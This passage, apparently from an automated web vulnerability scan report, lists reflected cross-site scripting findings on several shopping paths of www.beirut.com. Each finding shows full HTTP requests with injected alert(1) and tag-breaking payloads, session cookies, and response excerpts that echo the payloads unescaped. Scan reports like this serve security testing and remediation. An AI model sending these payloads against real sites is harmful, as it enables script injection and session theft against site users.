<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping36118'-alert(1)-'3205e213c6/Home-Furnishings/4120758082/Furniture/19';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1011. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Furniture/19 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Furniture/19

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8d36"><a>85eddb2ca86 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shoppingf8d36"><a>85eddb2ca86/Home-Furnishings/4120758082/Furniture/19 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:13:16 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60042

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shoppingf8d36"><a>85eddb2ca86">
...[SNIP]...

4.1012. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Furniture/19 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Furniture/19

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 91ec5<script>alert(1)</script>adf64f49404 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Home-Furnishings91ec5<script>alert(1)</script>adf64f49404/4120758082/Furniture/19 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:28:39 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61396

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Home Furnishings91ec5<script>alert(1)</script>adf64f49404 <a href="#" id="backlink">
...[SNIP]...

4.1013. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Furniture/19 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Furniture/19

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5860d'-alert(1)-'963cfe6c8a9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Home-Furnishings5860d'-alert(1)-'963cfe6c8a9/4120758082/Furniture/19 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:27:27 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61596

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Home-Furnishings5860d'-alert(1)-'963cfe6c8a9/4120758082/Furniture/19';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1014. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Furniture/19 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Furniture/19

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e30a'-alert(1)-'5c94fb05aa8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Home-Furnishings/41207580829e30a'-alert(1)-'5c94fb05aa8/Furniture/19 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:33:29 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61312

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Home-Furnishings/41207580829e30a'-alert(1)-'5c94fb05aa8/Furniture/19';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1015. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Furniture/19 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Furniture/19

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac6a1'-alert(1)-'d4a79eb1946 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Home-Furnishings/4120758082/Furnitureac6a1'-alert(1)-'d4a79eb1946/19 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:38:09 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61578

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Home-Furnishings/4120758082/Furnitureac6a1'-alert(1)-'d4a79eb1946/19';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1016. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Furniture/19 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Furniture/19

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a4c8'-alert(1)-'183345e8a7c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Home-Furnishings/4120758082/Furniture/195a4c8'-alert(1)-'183345e8a7c HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:43:32 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54956

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping/Home-Furnishings/4120758082/Furniture/195a4c8'-alert(1)-'183345e8a7c';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1017. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Home-Fixtures/65 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Home-Fixtures/65

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b329"><a>52e80b7a0fe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping3b329"><a>52e80b7a0fe/Home-Furnishings/4120758082/Home-Fixtures/65 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:03:33 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60075

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping3b329"><a>52e80b7a0fe">
...[SNIP]...

4.1018. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Home-Fixtures/65 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Home-Fixtures/65

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98bd8'-alert(1)-'9879e2d7893 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping98bd8'-alert(1)-'9879e2d7893/Home-Furnishings/4120758082/Home-Fixtures/65 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:11:29 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59839

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping98bd8'-alert(1)-'9879e2d7893/Home-Furnishings/4120758082/Home-Fixtures/65';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1019. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Home-Fixtures/65 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Home-Fixtures/65

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e351f'-alert(1)-'c380dbc0e19 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Home-Furnishingse351f'-alert(1)-'c380dbc0e19/4120758082/Home-Fixtures/65 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:14:58 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61788

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Home-Furnishingse351f'-alert(1)-'c380dbc0e19/4120758082/Home-Fixtures/65';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1020. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Home-Fixtures/65 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Home-Fixtures/65

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f13ce<script>alert(1)</script>180069a8d1e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Home-Furnishingsf13ce<script>alert(1)</script>180069a8d1e/4120758082/Home-Fixtures/65 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:16:32 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Home Furnishingsf13ce<script>alert(1)</script>180069a8d1e <a href="#" id="backlink">
...[SNIP]...

4.1021. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Home-Fixtures/65 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Home-Fixtures/65

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6c529'-alert(1)-'8525a6d20e2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Home-Furnishings/41207580826c529'-alert(1)-'8525a6d20e2/Home-Fixtures/65 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:20:59 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61159

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Home-Furnishings/41207580826c529'-alert(1)-'8525a6d20e2/Home-Fixtures/65';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1022. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Home-Fixtures/65 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Home-Fixtures/65

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3e06b'-alert(1)-'bcb2460354f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Home-Furnishings/4120758082/Home-Fixtures3e06b'-alert(1)-'bcb2460354f/65 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:26:55 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61422

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Home-Furnishings/4120758082/Home-Fixtures3e06b'-alert(1)-'bcb2460354f/65';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1023. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Home-Fixtures/65 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Home-Fixtures/65

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a2b82'-alert(1)-'1ec06449d9f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Home-Furnishings/4120758082/Home-Fixtures/65a2b82'-alert(1)-'1ec06449d9f HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:30:57 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
